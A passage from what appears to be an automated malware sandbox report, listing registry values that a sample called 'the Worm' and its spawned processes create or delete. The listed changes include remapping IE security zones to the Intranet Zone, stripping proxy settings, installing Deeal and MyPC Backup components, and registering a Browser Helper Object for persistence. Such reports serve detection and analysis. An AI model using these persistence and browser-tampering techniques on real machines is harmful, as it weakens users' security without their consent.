"Seed" = "63 11 03 4C 00 F2 8B E6 81 DA 90 7F 9C 1E CD 6F"
The process taskkill.exe:3320 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 7E 85 61 6E EB 17 96 4D FB AB 9F 94 9B C3 08"
The process taskkill.exe:3464 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 E7 EA 68 70 57 22 BB 3F FA 8B 50 AE 44 2E 7B"
The process taskkill.exe:416 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 A9 41 A0 B3 2C 42 0B CE 37 55 33 57 1F DA 21"
The process taskkill.exe:2532 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 30 B4 5F 77 C3 A3 69 91 FE 0D 0D 01 E0 07 14"
The process taskkill.exe:1660 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 0B BB 57 B2 B0 EA 97 5E 24 ED 31 B1 88 7C 7D"
The process BackgroundHost.exe:3236 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A B0 29 1F 87 1E 35 9F 47 B4 DA EA 83 D4 C3 2D"
The process win-app_update_3.exe:2120 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 39 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"~ssqyvbc.exe" = "~ssqyvbc"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 2B 29 08 68 CC 16 55 80 01 73 23 71 E9 8C 94"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process myapp_update_1.exe:1508 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 13 19 BF F0 1C 76 A3 CB 6D E7 78 E5 7B FE 54"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process OnlineBackup.exe:640 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MyPC Backup]
"(Default)" = "%Program Files%\MyPC Backup\BackupStack.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz45.tmp\nsSCM.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPC Backup]
"DisplayName" = "MyPC Backup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPC Backup]
"URLInfoAbout" = "http://www.mypcbackup.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPC Backup]
"Publisher" = "JDi Backup Ltd"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPC Backup]
"DisplayIcon" = "%Program Files%\MyPC Backup\MyPC Backup.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPC Backup]
"UninstallString" = "%Program Files%\MyPC Backup\uninst.exe"
"HelpLink" = "http://support.mypcbackup.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 64 E7 7C 9B 2D 0E E4 CA F3 FE 99 CA F5 5A C4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\MyPC Backup]
"MyPC Backup.exe" = "MyPC Backup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPC Backup]
"DisplayVersion" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process regsvr32.exe:3276 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 27 A5 98 CC 39 06 2F 2A EB C8 0E F2 5A 65 40"
[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\ProxyStubClsid32]
"(Default)" = "{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}"
[HKCR\CLSID\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\InProcServer32]
"(Default)" = "%Program Files%\Deeal\BackgroundHostPS.dll"
"ThreadingModel" = "Both"
[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}]
"(Default)" = "IBrowserFrame"
[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}]
"(Default)" = "IBackgroundHost"
[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\NumMethods]
"(Default)" = "11"
[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\ProxyStubClsid32]
"(Default)" = "{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}"
The process regsvr32.exe:2748 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCR\JavaScript1.2 AuthorJavaScript1.3 Author]
"(Default)" = "JScript Language Authoring"
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32]
"(Default)" = "%System%\jscript.dll"
"ThreadingModel" = "Both"
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\ProgID]
"(Default)" = "JScript.Compact"
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\JScript Author\CLSID]
"(Default)" = "{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\LiveScript Author\CLSID]
"(Default)" = "{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\LiveScript\CLSID]
"(Default)" = "{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\JScript.Compact Author]
"(Default)" = "JScript Language Authoring"
[HKCR\JavaScript1.2\CLSID]
"(Default)" = "{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\JavaScript1.1 Author\CLSID]
"(Default)" = "{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\ProgID]
"(Default)" = "JScript.Encode"
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}\ProgID]
"(Default)" = "JScript Author"
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\ProgID]
"(Default)" = "JScript"
[HKCR\JScript Author]
"(Default)" = "JScript Language Authoring"
[HKCR\Component Categories\{0AEE2A92-BCBB-11D0-8C72-00C04FC2B085}]
"409" = "Active Scripting Engine with Authoring"
[HKCR\ECMAScript\CLSID]
"(Default)" = "{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\Component Categories\{F0B7A1A1-9847-11CF-8F20-00805F2CD064}]
"409" = "Active Scripting Engine"
[HKCR\ECMAScript]
"(Default)" = "JScript Language"
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}]
"(Default)" = "JScript Language Encoding"
[HKCR\LiveScript Author]
"(Default)" = "JScript Language Authoring"
[HKCR\Component Categories\{F0B7A1A3-9847-11CF-8F20-00805F2CD064}]
"409" = "Active Scripting Engine with Encoding"
[HKCR\JScript.Encode\CLSID]
"(Default)" = "{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}]
"(Default)" = "JScript Language Authoring"
[HKCR\JavaScript1.3]
"(Default)" = "JScript Language"
[HKCR\JavaScript1.3\CLSID]
"(Default)" = "{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\JavaScript Author]
"(Default)" = "JScript Language Authoring"
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32]
"(Default)" = "%System%\jscript.dll"
[HKCR\ECMAScript Author]
"(Default)" = "JScript Language Authoring"
[HKCR\JavaScript1.1 Author]
"(Default)" = "JScript Language Authoring"
[HKCR\ECMAScript Author\CLSID]
"(Default)" = "{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\JScript.Compact\CLSID]
"(Default)" = "{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}"
[HKCR\JavaScript\CLSID]
"(Default)" = "{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}]
"(Default)" = "JScript Compact Profile (ECMA 327)"
[HKCR\JScript.Compact]
"(Default)" = "JScript Compact Profile (ECMA 327)"
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}]
"(Default)" = "JScript Language"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 99 9B 3F 65 5B 84 1A F4 C5 68 50 7D 07 FC EE"
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\InprocServer32]
"(Default)" = "%System%\jscript.dll"
[HKCR\JScript.Encode]
"(Default)" = "JScript Language Encoding"
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32]
"(Default)" = "%System%\jscript.dll"
[HKCR\JavaScript1.1\CLSID]
"(Default)" = "{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\JavaScript1.1]
"(Default)" = "JScript Language"
[HKCR\JavaScript]
"(Default)" = "JScript Language"
[HKCR\JavaScript Author\CLSID]
"(Default)" = "{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\JScript\CLSID]
"(Default)" = "{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\JScript]
"(Default)" = "JScript Language"
[HKCR\LiveScript]
"(Default)" = "JScript Language"
[HKCR\JScript.Compact Author\CLSID]
"(Default)" = "{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\JavaScript1.2 AuthorJavaScript1.3 Author\CLSID]
"(Default)" = "{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}"
[HKCR\JavaScript1.2]
"(Default)" = "JScript Language"
[HKCR\Component Categories\{F0B7A1A2-9847-11CF-8F20-00805F2CD064}]
"409" = "Active Scripting Engine with Parsing"
The Worm deletes the following registry key(s):
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}\ProgID]
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}]
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories\{F0B7A1A1-9847-11CF-8F20-00805F2CD064}]
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories\{F0B7A1A2-9847-11CF-8F20-00805F2CD064}]
[HKCR\ECMAScript Author\OLEScript]
[HKCR\ECMAScript]
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\Implemented Categories\{F0B7A1A2-9847-11CF-8F20-00805F2CD064}]
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\OLEScript]
[HKCR\JScript.Compact]
[HKCR\JavaScript1.2 AuthorJavaScript1.3 Author]
[HKCR\LiveScript\OLEScript]
[HKCR\JScript Author]
[HKCR\JScript Author\CLSID]
[HKCR\JavaScript1.1 Author\OLEScript]
[HKCR\JScript.Compact Author\OLEScript]
[HKCR\JScript.Encode\CLSID]
[HKCR\JavaScript\OLEScript]
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}]
[HKCR\ECMAScript\OLEScript]
[HKCR\JScript.Compact\OLEScript]
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\OLEScript]
[HKCR\JScript.Compact Author\CLSID]
[HKCR\JavaScript1.1\OLEScript]
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32]
[HKCR\JavaScript Author]
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}\OLEScript]
[HKCR\JScript\CLSID]
[HKCR\ECMAScript Author\CLSID]
[HKCR\JavaScript Author\OLEScript]
[HKCR\JScript.Compact Author]
[HKCR\JavaScript Author\CLSID]
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories\{0AEE2A92-BCBB-11D0-8C72-00C04FC2B085}]
[HKCR\LiveScript]
[HKCR\JavaScript\CLSID]
[HKCR\JScript.Compact\CLSID]
[HKCR\JavaScript1.3\CLSID]
[HKCR\JScript Author\OLEScript]
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32]
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories\{F0B7A1A2-9847-11CF-8F20-00805F2CD064}]
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories]
[HKCR\LiveScript Author\CLSID]
[HKCR\JavaScript1.3\OLEScript]
[HKCR\LiveScript\CLSID]
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories]
[HKCR\JavaScript1.2 AuthorJavaScript1.3 Author\OLEScript]
[HKCR\JavaScript1.2\OLEScript]
[HKCR\JavaScript]
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32]
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\ProgID]
[HKCR\JScript]
[HKCR\JavaScript1.2]
[HKCR\JavaScript1.3]
[HKCR\LiveScript Author]
[HKCR\JavaScript1.1]
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\Implemented Categories]
[HKCR\ECMAScript Author]
[HKCR\JScript.Encode\OLEScript]
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories]
[HKCR\JavaScript1.2\CLSID]
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\OLEScript]
[HKCR\LiveScript Author\OLEScript]
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories\{F0B7A1A1-9847-11CF-8F20-00805F2CD064}]
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\InprocServer32]
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\Implemented Categories\{F0B7A1A3-9847-11CF-8F20-00805F2CD064}]
[HKCR\CLSID\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}]
[HKCR\ECMAScript\CLSID]
[HKCR\JScript\OLEScript]
[HKCR\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\ProgID]
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\ProgID]
[HKCR\JavaScript1.1\CLSID]
[HKCR\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}]
[HKCR\JavaScript1.1 Author\CLSID]
[HKCR\JavaScript1.2 AuthorJavaScript1.3 Author\CLSID]
[HKCR\CLSID\{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}\Implemented Categories\{F0B7A1A1-9847-11CF-8F20-00805F2CD064}]
[HKCR\JScript.Encode]
[HKCR\JavaScript1.1 Author]
The process regsvr32.exe:3296 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCR\Deeal.ScriptHostObject\CLSID]
"(Default)" = "{70C53538-9F82-42BC-A327-74F7A46E700C}"
[HKCR\CLSID\{70C53538-9F82-42BC-A327-74F7A46E700C}\InprocServer32]
"(Default)" = "%Program Files%\Deeal\ScriptHost.dll"
[HKCR\Deeal.ScriptHostObject]
"(Default)" = "Deeal"
[HKCR\TypeLib\{85CD8584-3403-4489-B826-CA6FCE6E1694}\1.0\0\win32]
"(Default)" = "%Program Files%\Deeal\ScriptHost.dll"
[HKCR\CLSID\{70C53538-9F82-42BC-A327-74F7A46E700C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{A74D0C30-5CE2-4E3E-9C35-99ABEC75BE51}\ProgID]
"(Default)" = "ScriptHost.Tool.1"
[HKCR\CLSID\{70C53538-9F82-42BC-A327-74F7A46E700C}\ProgID]
"(Default)" = "Deeal.ScriptHostObject.1"
[HKCR\Deeal.ScriptHostObject.1]
"(Default)" = "Deeal"
[HKCR\ScriptHost.Tool\CLSID]
"(Default)" = "{A74D0C30-5CE2-4E3E-9C35-99ABEC75BE51}"
[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\TypeLib]
"(Default)" = "{85CD8584-3403-4489-B826-CA6FCE6E1694}"
[HKCR\Deeal.ScriptHostObject.1\CLSID]
"(Default)" = "{70C53538-9F82-42BC-A327-74F7A46E700C}"
[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\ScriptHost.Tool.1\CLSID]
"(Default)" = "{A74D0C30-5CE2-4E3E-9C35-99ABEC75BE51}"
[HKCR\ScriptHost.Tool]
"(Default)" = "Tool Class"
[HKCR\CLSID\{70C53538-9F82-42BC-A327-74F7A46E700C}\VersionIndependentProgID]
"(Default)" = "Deeal.ScriptHostObject"
[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}]
"(Default)" = "ITool"
[HKCR\Deeal.ScriptHostObject\CurVer]
"(Default)" = "Deeal.ScriptHostObject.1"
[HKCR\CLSID\{A74D0C30-5CE2-4E3E-9C35-99ABEC75BE51}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{85CD8584-3403-4489-B826-CA6FCE6E1694}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\AppID\{562B9316-C08A-444A-9482-62080DD851AE}]
"(Default)" = "Deeal"
[HKCR\TypeLib\{85CD8584-3403-4489-B826-CA6FCE6E1694}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Deeal"
[HKCR\ScriptHost.Tool.1]
"(Default)" = "Tool Class"
[HKCR\CLSID\{A74D0C30-5CE2-4E3E-9C35-99ABEC75BE51}\InprocServer32]
"(Default)" = "%Program Files%\Deeal\ScriptHost.dll"
[HKCR\CLSID\{70C53538-9F82-42BC-A327-74F7A46E700C}]
"(Default)" = "Deeal"
[HKCR\AppID\ScriptHost.DLL]
"AppID" = "{562B9316-C08A-444A-9482-62080DD851AE}"
[HKCR\ScriptHost.Tool\CurVer]
"(Default)" = "ScriptHost.Tool.1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 0E C0 A3 B2 61 E2 CA FC A9 6A F3 E2 41 9B 04"
[HKCR\CLSID\{A74D0C30-5CE2-4E3E-9C35-99ABEC75BE51}]
"(Default)" = "Tool Class"
[HKCR\CLSID\{A74D0C30-5CE2-4E3E-9C35-99ABEC75BE51}\TypeLib]
"(Default)" = "{85CD8584-3403-4489-B826-CA6FCE6E1694}"
[HKCR\TypeLib\{85CD8584-3403-4489-B826-CA6FCE6E1694}\1.0]
"(Default)" = "ScriptHost 1.0 Type Library"
[HKCU\Software\Deeal]
"installId" = "6BFABB20-3DE2-4c6d-9586-23D2594A59F8"
[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{70C53538-9F82-42BC-A327-74F7A46E700C}\TypeLib]
"(Default)" = "{85CD8584-3403-4489-B826-CA6FCE6E1694}"
[HKCR\CLSID\{A74D0C30-5CE2-4E3E-9C35-99ABEC75BE51}\VersionIndependentProgID]
"(Default)" = "ScriptHost.Tool"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{70C53538-9F82-42BC-A327-74F7A46E700C}]
"NoExplorer" = "1"
The process regsvr32.exe:188 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCR\AppID\ButtonSite.DLL]
